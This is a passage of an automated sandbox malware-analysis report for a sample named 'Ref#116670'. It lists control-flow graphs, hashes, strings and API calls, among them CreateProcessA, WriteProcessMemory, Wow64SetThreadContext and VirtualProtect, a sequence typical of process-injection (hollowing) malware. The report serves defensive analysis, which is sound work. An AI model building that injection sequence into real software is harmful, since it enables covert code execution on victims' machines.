                                                                                                                                  • Instruction ID: 859838d57fcecb2240271971edf7c239815874c70a3ed04eb80277bd03d303cf
                                                                                                                                  • Opcode Fuzzy Hash: e8546bdc5c01acb554059d975c760f81c3b19ce4295d06402a5f61641f02a3c0
                                                                                                                                  • Instruction Fuzzy Hash: 8F42F734E1420DDFEF94DBA8D8686ADB7B6FF88314F148415DA12E7294C7345A86CFA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2362 68929d0-68929f8 2363 68929fa 2362->2363 2364 68929ff-6892a28 2362->2364 2363->2364 2365 6892a49 2364->2365 2366 6892a2a-6892a33 2364->2366 2369 6892a4c-6892a50 2365->2369 2367 6892a3a-6892a3d 2366->2367 2368 6892a35-6892a38 2366->2368 2370 6892a47 2367->2370 2368->2370 2371 6892e07-6892e1e 2369->2371 2370->2369 2373 6892a55-6892a59 2371->2373 2374 6892e24-6892e28 2371->2374 2377 6892a5b-6892ab8 2373->2377 2378 6892a5e-6892a62 2373->2378 2375 6892e2a-6892e5a 2374->2375 2376 6892e5d-6892e61 2374->2376 2375->2376 2381 6892e63-6892e6c 2376->2381 2382 6892e82 2376->2382 2387 6892aba-6892b2b 2377->2387 2388 6892abd-6892ac1 2377->2388 2379 6892a8b-6892aa6 2378->2379 2380 6892a64-6892a88 2378->2380 2405 6892aae-6892aaf 2379->2405 2380->2379 2384 6892e6e-6892e71 2381->2384 2385 6892e73-6892e76 2381->2385 2389 6892e85-6892e8b 2382->2389 2391 6892e80 2384->2391 2385->2391 2397 6892b2d-6892b8a 2387->2397 2398 6892b30-6892b34 2387->2398 2394 6892aea-6892afb 2388->2394 2395 6892ac3-6892ae7 2388->2395 2391->2389 2415 6892b04-6892b11 2394->2415 2395->2394 2407 6892b8c-6892be8 2397->2407 2408 6892b8f-6892b93 2397->2408 2401 6892b5d-6892b81 2398->2401 2402 6892b36-6892b5a 2398->2402 2401->2371 2402->2401 2405->2371 2419 6892bea-6892c4c 2407->2419 2420 6892bed-6892bf1 2407->2420 2409 6892bbc-6892bbf 2408->2409 2410 6892b95-6892bb9 2408->2410 2424 6892bc7-6892bdf 2409->2424 2410->2409 2417 6892b21-6892b22 2415->2417 2418 6892b13-6892b19 2415->2418 2417->2371 2418->2417 2429 6892c4e-6892cb0 2419->2429 2430 6892c51-6892c55 2419->2430 2427 6892c1a-6892c32 2420->2427 2428 6892bf3-6892c17 2420->2428 2424->2371 2439 6892c42-6892c43 2427->2439 2440 6892c34-6892c3a 2427->2440 2428->2427 2441 6892cb2-6892d14 2429->2441 2442 6892cb5-6892cb9 2429->2442 2437 6892c7e-6892c96 2430->2437 2438 6892c57-6892c7b 2430->2438 2450 6892c98-6892c9e 2437->2450 2451 6892ca6-6892ca7 2437->2451 2438->2437 2439->2371 2440->2439 2452 6892d19-6892d1d 2441->2452 2453 6892d16-6892d78 2441->2453 2448 6892cbb-6892cdf 2442->2448 2449 6892ce2-6892cfa 2442->2449 2448->2449 2461 6892d0a-6892d0b 2449->2461 2462 6892cfc-6892d02 2449->2462 2450->2451 2451->2371 2459 6892d1f-6892d43 2452->2459 2460 6892d46-6892d5e 2452->2460 2463 6892d7a-6892dd3 2453->2463 2464 6892d7d-6892d81 2453->2464 2459->2460 2472 6892d6e-6892d6f 2460->2472 2473 6892d60-6892d66 2460->2473 2461->2371 2462->2461 2474 6892dfc-6892dff 2463->2474 2475 6892dd5-6892df9 2463->2475 2470 6892daa-6892dcd 2464->2470 2471 6892d83-6892da7 2464->2471 2470->2371 2471->2470 2472->2371 2473->2472 2474->2371 2475->2474
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: cd403db357be6f061dff2b3ef9e874231fdca8a2f9affb6c59ccc0a1b350cf61
                                                                                                                                  • Instruction ID: bbfff103345fc87156f18dab8971a53080b4a98123b656d560f65808f041488e
                                                                                                                                  • Opcode Fuzzy Hash: cd403db357be6f061dff2b3ef9e874231fdca8a2f9affb6c59ccc0a1b350cf61
                                                                                                                                  • Instruction Fuzzy Hash: 47F1D134E1120CEFDF98DFA4E5A46ACBBB2FF49315F248429E506A7291CB345A85CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2487 6a1b460-6a1b472 2488 6a1b474-6a1b495 2487->2488 2489 6a1b49c-6a1b4a0 2487->2489 2488->2489 2490 6a1b4a2-6a1b4a4 2489->2490 2491 6a1b4ac-6a1b4bb 2489->2491 2490->2491 2492 6a1b4c7-6a1b4f3 2491->2492 2493 6a1b4bd 2491->2493 2497 6a1b720-6a1b755 2492->2497 2498 6a1b4f9-6a1b4ff 2492->2498 2493->2492 2523 6a1b756-6a1b767 2497->2523 2500 6a1b5d1-6a1b5d5 2498->2500 2501 6a1b505-6a1b50b 2498->2501 2504 6a1b5d7-6a1b5e0 2500->2504 2505 6a1b5f8-6a1b601 2500->2505 2501->2497 2503 6a1b511-6a1b51e 2501->2503 2509 6a1b5b0-6a1b5b9 2503->2509 2510 6a1b524-6a1b52d 2503->2510 2504->2497 2506 6a1b5e6-6a1b5f6 2504->2506 2507 6a1b603-6a1b623 2505->2507 2508 6a1b626-6a1b629 2505->2508 2511 6a1b62c-6a1b632 2506->2511 2507->2508 2508->2511 2509->2497 2513 6a1b5bf-6a1b5cb 2509->2513 2510->2497 2514 6a1b533-6a1b54b 2510->2514 2511->2497 2518 6a1b638-6a1b64b 2511->2518 2513->2500 2513->2501 2515 6a1b557-6a1b569 2514->2515 2516 6a1b54d 2514->2516 2515->2509 2525 6a1b56b-6a1b571 2515->2525 2516->2515 2518->2497 2520 6a1b651-6a1b661 2518->2520 2520->2497 2524 6a1b667-6a1b674 2520->2524 2531 6a1b769 2523->2531 2532 6a1b77d-6a1b789 2523->2532 2524->2497 2526 6a1b67a-6a1b68f 2524->2526 2527 6a1b573 2525->2527 2528 6a1b57d-6a1b583 2525->2528 2526->2497 2537 6a1b695-6a1b6b8 2526->2537 2527->2528 2528->2497 2530 6a1b589-6a1b5ad 2528->2530 2536 6a1b76c-6a1b76e 2531->2536 2534 6a1b795-6a1b7b1 2532->2534 2535 6a1b78b 2532->2535 2535->2534 2539 6a1b770-6a1b77b 2536->2539 2540 6a1b7b2-6a1b7c0 2536->2540 2537->2497 2543 6a1b6ba-6a1b6c5 2537->2543 2539->2532 2539->2536 2540->2523 2548 6a1b7c2-6a1b7df call 6a16cc0 2540->2548 2545 6a1b6c7-6a1b6d1 2543->2545 2546 6a1b716-6a1b71d 2543->2546 2545->2546 2552 6a1b6d3-6a1b6e9 2545->2552 2553 6a1b7e1-6a1b7e7 2548->2553 2554 6a1b7f7-6a1b7f9 2548->2554 2561 6a1b6f5-6a1b70e 2552->2561 2562 6a1b6eb 2552->2562 2555 6a1b7e9 2553->2555 2556 6a1b7eb-6a1b7ed 2553->2556 2575 6a1b7fb call 6a1ca30 2554->2575 2576 6a1b7fb call 6a1b878 2554->2576 2555->2554 2556->2554 2557 6a1b801-6a1b805 2559 6a1b850-6a1b860 2557->2559 2560 6a1b807-6a1b81e 2557->2560 2560->2559 2568 6a1b820-6a1b82a 2560->2568 2561->2546 2562->2561 2570 6a1b83d-6a1b84d 2568->2570 2571 6a1b82c-6a1b83b 2568->2571 2571->2570 2575->2557 2576->2557
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$d
                                                                                                                                  • API String ID: 0-3557608343
                                                                                                                                  • Opcode ID: fcba61103e45106b2071a00345430b3f6c7f545988515ed8987ef49a6cd6e51a
                                                                                                                                  • Instruction ID: d924861b6b3dccffe91cd9539bba7a61af01701381a1dfd67d7597200d0640d3
                                                                                                                                  • Opcode Fuzzy Hash: fcba61103e45106b2071a00345430b3f6c7f545988515ed8987ef49a6cd6e51a
                                                                                                                                  • Instruction Fuzzy Hash: BED17934600606CFCB14DF29C58096ABBF6FF89314B15C969E55A8F765DB30F846CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2577 6893968-689398d 2578 689398f 2577->2578 2579 6893994-68939b3 2577->2579 2578->2579 2580 68939b5-68939be 2579->2580 2581 68939d4 2579->2581 2583 68939c0-68939c3 2580->2583 2584 68939c5-68939c8 2580->2584 2582 68939d7-68939db 2581->2582 2586 6893b96-6893bad 2582->2586 2585 68939d2 2583->2585 2584->2585 2585->2582 2588 68939e0-68939e4 2586->2588 2589 6893bb3-6893bb7 2586->2589 2590 68939e9-68939ed 2588->2590 2591 68939e6-6893a41 2588->2591 2592 6893bb9-6893bdd 2589->2592 2593 6893be0-6893be4 2589->2593 2597 68939ef-6893a13 2590->2597 2598 6893a16-6893a38 2590->2598 2599 6893a43-6893aa4 2591->2599 2600 6893a46-6893a4a 2591->2600 2592->2593 2594 6893c05 2593->2594 2595 6893be6-6893bef 2593->2595 2603 6893c08-6893c0e 2594->2603 2601 6893bf1-6893bf4 2595->2601 2602 6893bf6-6893bf9 2595->2602 2597->2598 2598->2586 2611 6893aa9-6893aad 2599->2611 2612 6893aa6-6893b07 2599->2612 2606 6893a4c-6893a70 2600->2606 2607 6893a73-6893a8a 2600->2607 2608 6893c03 2601->2608 2602->2608 2606->2607 2624 6893a9a-6893a9b 2607->2624 2625 6893a8c-6893a92 2607->2625 2608->2603 2616 6893aaf-6893ad3 2611->2616 2617 6893ad6-6893aed 2611->2617 2622 6893b09-6893b62 2612->2622 2623 6893b0c-6893b10 2612->2623 2616->2617 2635 6893afd-6893afe 2617->2635 2636 6893aef-6893af5 2617->2636 2633 6893b8b-6893b8e 2622->2633 2634 6893b64-6893b88 2622->2634 2627 6893b39-6893b5c 2623->2627 2628 6893b12-6893b36 2623->2628 2624->2586 2625->2624 2627->2586 2628->2627 2633->2586 2634->2633 2635->2586 2636->2635
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 28d6e9386c8d500bd9bb5b78d4ae86ac39a04f3f91db2346249bbae7dea0489e
                                                                                                                                  • Instruction ID: 0fbd7f65cd0def4ecea1dd368408650d065a01962a6fe2cc5a7a6c7257da7af8
                                                                                                                                  • Opcode Fuzzy Hash: 28d6e9386c8d500bd9bb5b78d4ae86ac39a04f3f91db2346249bbae7dea0489e
                                                                                                                                  • Instruction Fuzzy Hash: FA91FE30E05208CFDF98DFA9D9486EDBBB6AF89315F148429D522B7390CB316985CF60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2648 6a174d0-6a174f2 2649 6a175e6-6a1760b 2648->2649 2650 6a174f8-6a174fa 2648->2650 2652 6a17612-6a17636 2649->2652 2651 6a17500-6a1750c 2650->2651 2650->2652 2657 6a17520-6a17530 2651->2657 2658 6a1750e-6a1751a 2651->2658 2664 6a1763d-6a17661 2652->2664 2657->2664 2665 6a17536-6a17544 2657->2665 2658->2657 2658->2664 2668 6a17668-6a176eb 2664->2668 2665->2668 2669 6a1754a-6a1754f 2665->2669 2691 6a176f2-6a17700 call 6a16cc0 2668->2691 2692 6a176ed call 6a14e18 2668->2692 2702 6a17551 call 6a176e0 2669->2702 2703 6a17551 call 6a174d0 2669->2703 2671 6a17557-6a175a0 2686 6a175c3-6a175e3 call 6a15ac0 2671->2686 2687 6a175a2-6a175bb 2671->2687 2687->2686 2698 6a17702-6a17708 2691->2698 2699 6a17718-6a1771a 2691->2699 2692->2691 2700 6a1770a 2698->2700 2701 6a1770c-6a1770e 2698->2701 2700->2699 2701->2699 2702->2671 2703->2671
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$Haq
                                                                                                                                  • API String ID: 0-3785302501
                                                                                                                                  • Opcode ID: c66bcbf7ae56b30a1a2cb986b8c7adb27c66fd23b04400dd0f5634ff19039786
                                                                                                                                  • Instruction ID: 538d9a95b753e273645ceab42c5e0e0607c3869815fc7f9a2596745e657b80ba
                                                                                                                                  • Opcode Fuzzy Hash: c66bcbf7ae56b30a1a2cb986b8c7adb27c66fd23b04400dd0f5634ff19039786
                                                                                                                                  • Instruction Fuzzy Hash: E35158307002158FC799AF38C454A6EBBB2BF89310B1584ADE5169F3A5CE35ED46CB91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq
                                                                                                                                  • API String ID: 0-3916115647
                                                                                                                                  • Opcode ID: d3d630050af9618f4832dc01574050523c2310c1893a56d98e392569e7cef3ca
                                                                                                                                  • Instruction ID: 0a8bc3d3518901d453a628fce929022f6c8239e70d946dbe55ba4bd8ffea03b5
                                                                                                                                  • Opcode Fuzzy Hash: d3d630050af9618f4832dc01574050523c2310c1893a56d98e392569e7cef3ca
                                                                                                                                  • Instruction Fuzzy Hash: FA51AC317002198FDB54AF29D864AAE3BA6FF88310F108069E906CF395CF39DD42CB91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq
                                                                                                                                  • API String ID: 0-3092978723
                                                                                                                                  • Opcode ID: 71a8a3bcc99d64e0c70e236efc1fd9c371722f3314510a9995ecdc0c4d5583ef
                                                                                                                                  • Instruction ID: d97e47cff89cf938ad4c22575088377ea329a43eb13bfec47e1fb00bd345e657
                                                                                                                                  • Opcode Fuzzy Hash: 71a8a3bcc99d64e0c70e236efc1fd9c371722f3314510a9995ecdc0c4d5583ef
                                                                                                                                  • Instruction Fuzzy Hash: 19520B75A002288FDB64DF69C945BDDBBF6BF88310F1580D9E909AB351DA309E81CF61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (_]q
                                                                                                                                  • API String ID: 0-188044275
                                                                                                                                  • Opcode ID: 4d90e893ea97bbcf08f5c383732fd8215407ed1af43efd419d53c03b1caff05f
                                                                                                                                  • Instruction ID: 19377d4ffedf8a3c98042e4f6b6f876c2cbdf04d60248a932963387dda682168
                                                                                                                                  • Opcode Fuzzy Hash: 4d90e893ea97bbcf08f5c383732fd8215407ed1af43efd419d53c03b1caff05f
                                                                                                                                  • Instruction Fuzzy Hash: CA226E35A002089FDB44DF68D494AAEBBF6FF88310F158159E905AF3A5CB75ED81CB90
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0245B6FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: 6e97ff7b11a8d04ef4d51760d4ff4ad2651fb9cdd926152be50da58022138b29
                                                                                                                                  • Instruction ID: 220c12cbca4a81680ac4fb45f64b57fdb516340eac48f5d29a8b61866a0b548c
                                                                                                                                  • Opcode Fuzzy Hash: 6e97ff7b11a8d04ef4d51760d4ff4ad2651fb9cdd926152be50da58022138b29
                                                                                                                                  • Instruction Fuzzy Hash: 70813470A00B148FD728DF2AD45175ABBF1FF88308F00892AD88ADBB55D734E945CB91
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB132A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 1983ed55e152c88a60e57cb070352247fa036a8d48120ccf3392cc10bdaef1c5
                                                                                                                                  • Instruction ID: 9fba047495a4e69e2ccc0cc25a0555ac17f52eeba16bb95973a83388c32f7024
                                                                                                                                  • Opcode Fuzzy Hash: 1983ed55e152c88a60e57cb070352247fa036a8d48120ccf3392cc10bdaef1c5
                                                                                                                                  • Instruction Fuzzy Hash: 9F812771D002599FEB10CFA9C8957EDBBF2BF48310F188A29E855E7284D7B49981CB81
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB132A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 2af25020d1adafd5fe9b1a8ad7582db41174cc7258e4322ed98a09ce68fa90e6
                                                                                                                                  • Instruction ID: 7c23f2dc063fa3be6f3ac5329a67254c9a36967a9ca74d4dc106066581737938
                                                                                                                                  • Opcode Fuzzy Hash: 2af25020d1adafd5fe9b1a8ad7582db41174cc7258e4322ed98a09ce68fa90e6
                                                                                                                                  • Instruction Fuzzy Hash: 28811671D002599FEB10DFA9C8957EDBBF2BF48310F188629E855E7244D7B49981CB81
                                                                                                                                  APIs
                                                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05CD7335
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CopyFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                  • Opcode ID: ac1b3ca8e732dc80bfca1c6770f1afec372aae31a864bdeb7b924ed9afae7881
                                                                                                                                  • Instruction ID: 68926fb3d8908acbe335ba5dfff9a32ea54574deb34a38a7b28146be552f2b8c
                                                                                                                                  • Opcode Fuzzy Hash: ac1b3ca8e732dc80bfca1c6770f1afec372aae31a864bdeb7b924ed9afae7881
                                                                                                                                  • Instruction Fuzzy Hash: F4515971D00659DFDB10DFA9C8857AEFBF2FF48310F148929E855E6280DB789981CBA1
                                                                                                                                  APIs
                                                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05CD7335
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CopyFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                  • Opcode ID: 4ec035dbb7404dc74c34ca15762fbf2843ff825b711893289fbda6b811833eb8
                                                                                                                                  • Instruction ID: e5e18b16de146b30f47470ce94b5c1eab84d30210c539c4ca3f946f9faf78240
                                                                                                                                  • Opcode Fuzzy Hash: 4ec035dbb7404dc74c34ca15762fbf2843ff825b711893289fbda6b811833eb8
                                                                                                                                  • Instruction Fuzzy Hash: 54515771D00659DFDB10DFA9C8857AEFBF2FF48310F148929E855E6280DB7899818BA1
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB2248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 80a863a2e2388825eedf0c64e30540646b3f1ba21dc236bbe41b4bb39f25cb9f
                                                                                                                                  • Instruction ID: 999dbeed68bf20e00328f4db554eddb140d176354b655d1b0134ca14b60d7e2f
                                                                                                                                  • Opcode Fuzzy Hash: 80a863a2e2388825eedf0c64e30540646b3f1ba21dc236bbe41b4bb39f25cb9f
                                                                                                                                  • Instruction Fuzzy Hash: EE213BB59003099FDF10DFA9C945BEEBBF5FF48310F108429E919A7240C7789945CBA1
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB2248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 9d67c1590816fa228c7a4cf243b4976a2dad71edbeb6885e289226fdc49567e4
                                                                                                                                  • Instruction ID: 4892fbaf59b2a5f3eeda2fd698c1eabb96d196c0c7c397cdb6331c8738b5ae4e
                                                                                                                                  • Opcode Fuzzy Hash: 9d67c1590816fa228c7a4cf243b4976a2dad71edbeb6885e289226fdc49567e4
                                                                                                                                  • Instruction Fuzzy Hash: AE2148B59002099FDB10CFA9C9457EEBBF5FF48310F10882AE959A7240C7789541CBA0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB1996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: e25d4de4daffba1fd3d8c8058d6700f36599641d7e4259f6ed4d4b5ed2e97889
                                                                                                                                  • Instruction ID: ad13593c96286055152752c4dfbe1a0d5614affc8924e616edf14e3f45f91676
                                                                                                                                  • Opcode Fuzzy Hash: e25d4de4daffba1fd3d8c8058d6700f36599641d7e4259f6ed4d4b5ed2e97889
                                                                                                                                  • Instruction Fuzzy Hash: 542115B1D002098FDB10DFAAC4857EEBBF4FF49314F54842AD559A7240CB78AA45CFA5
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB1996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: b332492a96726307c30055759f6eebfc9ada4e54683160946ce9f40c7d639327
                                                                                                                                  • Instruction ID: 05c08c0a4e9e7e8d79c4d44e55c5bc1e8e6c55e6b91aa9434d2186d92ce91f7f
                                                                                                                                  • Opcode Fuzzy Hash: b332492a96726307c30055759f6eebfc9ada4e54683160946ce9f40c7d639327
                                                                                                                                  • Instruction Fuzzy Hash: 372138B6D002098FDB10DFA9C5857EEBBF4BF48310F54842AD459A7240C7789A85CFA5
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0245DE0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: 4da721a4643d7a035ed0803d0cde39cee81604dced464f757749837dd81e5dd3
                                                                                                                                  • Instruction ID: cbb21236643d04b4d278a50ba0ea9da52a5536a64a19a438e3d68fff9e091c7b
                                                                                                                                  • Opcode Fuzzy Hash: 4da721a4643d7a035ed0803d0cde39cee81604dced464f757749837dd81e5dd3
                                                                                                                                  • Instruction Fuzzy Hash: 0821E4B5D002089FDB10CF9AD984ADEBBF9FF48310F14845AE958A3310D378A940CFA0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A0DB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 11603ec7fb7c14bba0da2c929926cdaa94bb3cc97b7cca22c67550624ced71f3
                                                                                                                                  • Instruction ID: e818e13d5276ac7b85205511a8178ff53b30665c2d67a711cc65bd1444d7b64f
                                                                                                                                  • Opcode Fuzzy Hash: 11603ec7fb7c14bba0da2c929926cdaa94bb3cc97b7cca22c67550624ced71f3
                                                                                                                                  • Instruction Fuzzy Hash: C62138B1C002499FDB10DFAAC845AEEFBF4FF49320F148429D459A7240CB389545CFA1
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A0DB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: eb03738a4ee2c1356eb821e3444577fef285ccb663aa5a6c56e63bcc461378b3
